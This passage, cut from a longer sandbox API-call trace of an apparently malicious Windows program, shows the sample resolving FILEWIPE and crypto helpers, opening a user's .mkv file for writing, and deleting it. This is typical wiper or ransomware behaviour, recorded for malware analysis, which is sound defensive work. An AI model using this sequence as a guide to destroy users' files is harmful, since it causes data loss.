lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.211] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0042.211] PeekMessageW (in: lpMsg=0x6ae3d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3d4) returned 0 [0042.211] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0042.211] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0042.211] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0042.211] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0042.211] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0042.211] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0042.211] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0042.211] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.211] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0042.212] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1710 | out: hHeap=0x770000) returned 1 [0042.212] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0042.212] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.212] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0042.212] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.212] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0042.212] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0042.212] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0042.212] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0042.212] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0042.212] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.212] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0042.212] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.212] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0042.212] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0042.212] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.212] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0042.212] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.212] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0042.212] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0042.212] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0042.212] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16e8 | out: hHeap=0x770000) returned 1 [0042.212] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0042.212] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0042.212] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.212] CryptReleaseContext (hProv=0x7d5b30, dwFlags=0x0) returned 1 [0042.213] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.213] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0042.213] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.213] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0042.213] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0042.213] FreeLibrary (hLibModule=0x754b0000) returned 1 [0042.213] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0042.213] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1710 | out: hHeap=0x770000) returned 1 [0042.213] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.213] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0042.213] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.213] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0042.213] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0042.213] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.213] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.213] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.214] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0042.214] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0042.214] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1af8 | out: hHeap=0x770000) returned 1 [0042.214] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0042.214] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.214] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.214] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\9c5dg.mkv", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x682dd840, ftCreationTime.dwHighDateTime=0x1d5c096, ftLastAccessTime.dwLowDateTime=0x242d1200, ftLastAccessTime.dwHighDateTime=0x1d5b75e, ftLastWriteTime.dwLowDateTime=0x242d1200, ftLastWriteTime.dwHighDateTime=0x1d5b75e, nFileSizeHigh=0x0, nFileSizeLow=0xe765, dwReserved0=0x0, dwReserved1=0x777648, cFileName="9c5dg.mkv", cAlternateFileName="")) returned 0x7c2100 [0042.214] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0042.215] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0042.215] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0042.215] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a08 | out: hHeap=0x770000) returned 1 [0042.215] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0042.215] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.215] CharLowerBuffW (in: lpsz="byte[59237]", cchLength=0xb | out: lpsz="byte[59237]") returned 0xb [0042.215] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.215] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0042.215] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0042.215] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0042.215] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.215] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0042.215] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0042.215] FreeLibrary (hLibModule=0x76b40000) returned 1 [0042.215] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0042.215] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0042.215] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0042.215] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1940 | out: hHeap=0x770000) returned 1 [0042.215] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0042.215] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0042.216] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0042.216] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0042.216] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0042.216] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0042.216] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0042.216] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0042.216] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0042.216] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0042.216] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0042.216] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0042.216] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0042.216] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0042.216] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0042.216] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0042.216] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0042.216] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0042.216] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0042.216] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0042.216] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0042.216] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0042.216] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0042.216] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0042.216] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0042.216] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.216] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.216] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.216] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0042.216] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.216] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.216] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.217] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.217] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.217] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.217] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.217] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.217] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.217] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.217] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.217] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.217] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.217] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.217] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.217] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.217] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0042.217] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0042.218] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\9c5dg.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ske8zl\\9c5dg.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0042.218] FreeLibrary (hLibModule=0x76e10000) returned 1 [0042.218] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.218] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.218] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.218] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0042.218] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.218] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.218] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0042.218] FreeLibrary (hLibModule=0x76e10000) returned 1 [0042.218] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.218] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.219] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.219] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.219] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0042.219] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.219] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.219] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0042.219] FreeLibrary (hLibModule=0x76e10000) returned 1 [0042.219] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.219] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.219] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.219] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\9c5dg.mkv", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\9c5dg.mkv", lpFilePart=0x0) returned 0x35 [0042.219] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\9c5dg.mkv", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x682dd840, ftCreationTime.dwHighDateTime=0x1d5c096, ftLastAccessTime.dwLowDateTime=0x242d1200, ftLastAccessTime.dwHighDateTime=0x1d5b75e, ftLastWriteTime.dwLowDateTime=0x18de4d40, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0xe765, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="9c5dg.mkv", cAlternateFileName="")) returned 0x7c2100 [0042.219] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\9c5dg.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ske8zl\\9c5dg.mkv")) returned 1 [0042.221] FindNextFileW (in: hFindFile=0x7c2100, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x682dd840, ftCreationTime.dwHighDateTime=0x1d5c096, ftLastAccessTime.dwLowDateTime=0x242d1200, ftLastAccessTime.dwHighDateTime=0x1d5b75e, ftLastWriteTime.dwLowDateTime=0x18de4d40, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0xe765, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="9c5dg.mkv", cAlternateFileName="")) returned 0 [0042.221] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0042.221] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.223] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0042.223] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0042.223] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0042.223] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0042.223] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0042.223] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0042.223] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0042.223] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0042.223] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0042.223] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0042.223] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0042.223] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0042.223] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0042.223] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0042.223] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0042.224] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0042.224] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0042.224] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0042.224] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0042.224] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0042.224] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0042.224] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0042.224] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0042.224] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0042.224] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0042.224] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0042.224] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0042.224] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0042.224] RtlAllocateHeap 